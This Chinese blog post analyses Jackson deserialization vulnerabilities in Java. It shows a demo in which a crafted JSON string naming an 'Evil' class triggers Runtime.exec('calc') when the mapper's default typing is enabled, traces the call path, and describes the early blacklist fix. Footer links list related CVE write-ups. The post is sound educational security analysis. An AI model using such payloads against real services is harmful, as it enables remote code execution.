Jackson 反序列化漏洞原理

已于 2023-03-13 23:13:06 修改
阅读量3.5k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Java代码审计 文章标签: java 开发语言
于 2023-02-28 23:58:45 首次发布
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/129260861
文章讨论了Jackson库在处理多态反序列化时可能存在的安全问题,当启用DefaultTyping或使用@JsonTypeInfo注解时,如果类的setter或无参构造函数有可利用点,可能导致反序列化攻击。文中提供了一个简单的Demo展示漏洞触发,并指出早期的修复方式是通过黑名单过滤,但这种方法并不完全可靠。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 前言

Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。

但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。

那么当json中的指定的类的seter或者无参构造方法中存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。

0x01 Jackson 漏洞触发缘由

Jackson可以两种方式来开放多态,或者换一个说法,当Jackson存在这两种配置的时候,就可以进行反序列化漏洞。

一个是通过DefaultTyping设置,还有一个是通过@JsonTypeInfo 注解。

1.DefaultTyping设置

该设置项存在四个选项。

  • JAVA_LANG_OBJECT 针对Object进行反序列化
  • OBJECT_AND_NON_CONCRETE 针对Object、Interface、AbstractClass
  • NON_CONCRETE_AND_ARRAYS 针对Object、Interface、AbstractClass、Array
  • NON_FINAL 针对除了声明为final之外的属性

如果是默认调用了:mapper.enableDefaultTyping,默认会选择第二个选项。

作为利用而言,只要配置了mapper.enableDefaultTyping就可以进行反序列化利用。

2.@JsonTypeInfo

@JsonTypeInfo注解包含五个配置

在这里插入图片描述

  • NONE 表面意思无
  • CLASS 针对Object @class
  • MINIMAL_CLASS Object缩写@c
  • NAME 指定的一个标识,感觉是忽略了类@type
  • CUSTOM 自定义

我们实际上能利用的就是下面这两种,但是一般这种情况会非常稀少

  • CLASS 针对Object @class
  • MINIMAL_CLASS Object缩写@c

在这里插入图片描述

0x02 反序列化Demo

1.环境:

    <dependencies>
        <dependency>
            <groupId>com.fasterxml.jackson.dataformat</groupId>
            <artifactId>jackson-dataformat-xml</artifactId>
            <version>2.7.9</version>
        </dependency>
    </dependencies>

People

package com;

public class People {
    public Object object;

    public void setObject(Object object) {
        this.object = object;
    }
}

Demo:

package com;

import com.fasterxml.jackson.databind.ObjectMapper;

public class Demo {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();

        String json = "{\"object\":[\"com.Evil\",{\"a\":\"a\"}]}";
        mapper.readValue(json, People.class);
    }
}

Evil

package com;

public class Evil {

    Evil(){
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

2.反序列化漏洞分析

readValue-_readMapAndClose

当以{的时候就会给一个START_OBJECT的标识
在这里插入图片描述

getDeserializationConfig加载配置:

在这里插入图片描述调用deser.deserialize模块

在这里插入图片描述

顺序执行到:vanillaDeserialize
在这里插入图片描述
this._valueInstantiator.createUsingDefault(ctxt);处调用了输入类的无参构造方法
在这里插入图片描述
然后遍历属性

在这里插入图片描述
跟进到deserialize方法,这里就是针对反序列化进行分流,如果是有标识,也就是我们配置了多态解析,就会进入deserializeWithType,否则会进入deserialize
在这里插入图片描述
看到deserializeWithType,进一步通过deserializeTypedFromAny进行解析
在这里插入图片描述
在_deserialize中获取类名准备进行构建

在这里插入图片描述
接着走vanillaDeserialize,首先调用空构造方法:
在这里插入图片描述
去调用setter方法
在这里插入图片描述

0x03 早期修复方式

在2.7.9.1中,通过黑名单进行过滤:主要黑名单内容如下:

在这里插入图片描述
黑名单的方式进行绕过是迟早的事情。

反序列化漏洞_Jackson反序列化漏洞
weixin_39839726的博客
12-14 1158
Author:平安银行应用安全团队@Glassy引言今天又看到有一些安全预警平台爆出的Jackson反序列漏洞,要求把Jackson升级到2.9.10.6,所以在下面对漏洞原理和适用范围做一下分析,并给出poc。补丁分析补丁特别简单,也如同漏洞公告一样,增加了几处黑名单。POC构造br.com.anteros.dbcp.AnterosDBCPDataSource先看一下该jar包的mav...
Jackson 反序列化漏洞
blackmagic的博客
08-07 2630
CVE-2017-7525 是 Jackson 数据绑定库(jackson-databind)中的一个严重漏洞,允许攻击者通过反序列化恶意构造的 JSON 数据来执行任意代码。攻击者构造特制的 JSON 数据,包含 @class 字段,指向一个易受攻击的类(如 com.zaxxer.hikari.HikariConfig,该类在初始化时会执行某些操作)。在这个示例中,@class 字段指定了 com.zaxxer.hikari.HikariConfig 类,而其属性则是 HikariCP 数据源的配置。
关于 Jackson 新的反序列化漏洞,从零基础到精通,收藏这篇就够了!
最新发布
QIANDXX的博客
05-23 1171
不必惊慌,pig4cloud[1] 默认没开启动态类型,并且 spring cache[2] 没有使用 jackson 序列化。如果你的 redis 采用的 jackson 序列化,并且是注入的全局的 ObjectMapper 请注意,请采用类似 mica-redis[3] 这样的 copy,来避免对全局的 ObjectMapper 污染导致不安全。后面我们会翻译两篇 Jackson 作者文章,让大家深入了解一下 Jackson 动态类型和安全机制。
jackson反序列化漏洞
l_l_c_q的博客
08-10 2047
jackson反序列化漏洞及POC
Jackson CVE-2018-19361 反序列化漏洞
王嘟嘟的博客
03-10 613
涉及版本:
Jackson反序列化代码执行漏洞
I want to know a little more.
06-09 2493
在我们的一次研究过程中,我们分析了一个使用Jackson库对JSON进行反序列化的应用程序。在分析过程中,我们寻找到一个反序列化漏洞,并可以对反序列化的类进行控制。在本文中,我们将向读者展示攻击者如何利用此反序列化漏洞来触发服务器端请求伪造(SSRF)和远程代码执行等攻击。 该研究催生了新的CVE-2019-12384生成,并影响到了一系列RedHat产品: 漏洞攻击条件 正如Jackson在On Jackson CVEs中写到的那样:下面是利用工具需要的要求: (1)应用程序接受由不受信任的客
jackson 序列化_CVE201912384:Jackson反序列化漏洞分析
weixin_39649660的博客
11-29 437
译文声明本文是翻译文章,文章原作者doyensec,文章来源:blog.doyensec.com原文地址:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html译文仅供参考,具体内容表达以及含义原文为0x00 前言在某次渗透测试过程中,我们分析的某个应用使用Jackson库来反序列化JSON数据。经过分析后,我们找到了一个反序列...
JAVAJackson反序列化漏洞.docx
07-27
以CVE-2020-10673为例,这是一个针对Jackson库的反序列化漏洞,它影响了Jackson 2.9.2版本。复现该漏洞通常涉及构造特定的JSON输入,利用Jackson反序列化时的弱点,触发恶意行为。在复现过程中,需要设置合适的环境...
Fastjson反序列化漏洞原理漏洞复现
weixin_46263525的博客
04-04 1992
Fastjson反序列化漏洞原理及反弹shell利用
探讨Jackson反序列化漏洞及POC利用方法
本知识点将详细探讨Jackson反序列化漏洞的概念、原理、影响以及如何应对和防范。 **Jackson反序列化漏洞概念:** 反序列化是指将序列化后的数据结构重新转换为对象的过程。当一个程序接收了不可信的JSON数据并使用...
JavaJackson反序列化漏洞深度解析
"深入解析JAVAJackson反序列化漏洞" 本文主要探讨了JavaJackson库的反序列化原理,以及相关的安全问题。Java反序列化是一个关键的编程概念,它允许将对象的状态转换为字节流,以便存储或在网络中传输,然后在...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里云应急响应中心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
jackson反序列化漏洞分析
m0_38043244的博客
06-01 5941
jackson反序列化漏洞分析
反序列化漏洞例子——jackson反序列化漏洞的调试与分析
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-30 4029
文章目录反序列化例子漏洞原因漏洞条件enableDefaultTyping@JsonTypeInfo总结调试CVE-2017-7525(基于TemplatesImpl利用链)影响版本利用 Jackson 是用来序列化和反序列化 json 的 Java 的开源框架,Jackson 运行时占用内存比较低,性能比较好,且不依靠除JDK外的其他库。 反序列化例子 举一个jackson进行序列化和反序列化的例子,首先,我的依赖包如下所示: <!-- jackson --> <depe
Windows和Linux系统查看端口和文件占用
A1_3_9_7的博客
03-21 852
在Windows环境中要知道当前端口被哪个进程所占用,或者是查看当前系统网络的会话连接,操作如下:(1)、查看端口被那个进程ID(PID)所占用查看指定端口,使用命令:netstat -ano | findstr “445”上边这个445端口当前正在监听0.0.0.0地址,可以看到占用进程PID为4findstr更多用法可以通过findstr /?查看(2)、通过PID查看进程上边已知进程PID为4,使用命令:tasklist | findstr "4"查找进程。
jackson 序列化_Jackson 反序列化安全漏洞 (CVE202024616)
weixin_39528559的博客
12-02 960
概述近日,数字观星应急团队监测到jackson-databind发布了jackson-databind序列化漏洞 的风险通告。br.com.anteros:Anteros-DBCP 中存在新的反序列化利用链,可以绕过jackson-databind 黑名单限制,远程攻击者通过向使用该组件的web服务接口发送特制请求包,可以造成远程代码执行影响。风险等级:高危漏洞类型:远程代码执行,反...
Jackson CVE-2017-7525 反序列化漏洞
王嘟嘟的博客
03-01 1144
Jackson 相对应fastjson来说利用方面要求更加苛刻,默认情况下无法进行利用。
CVE-2020-36189 jackson-databind java反序列化漏洞
mirocky的博客
10-13 3675
该方法允许json字符串中指定反序列化java对象的类名,而在使用Object、Map、List等对象时,可诱发反序列化漏洞,导致可执行任意命令。com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource类中实现了url的输入和调用,通过可控的url进行payload的打入,即可依靠ObjectMapper的反序列化漏洞实现SSRF和RCE。,}]的形式,将对象的参数的类名打印,是json中的类名。
java jackson漏洞_小白审计JACKSON反序列化漏洞
weixin_29100399的博客
02-16 1958
1. JACKSON漏洞解析poc代码:main.javaimportcom.fasterxml.jackson.databind.ObjectMapper;importcom.sun.org.apache.xerces.internal.impl.dv.util.Base64;importorg.springframework.util.FileCopyUtils;importjava.io.B...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值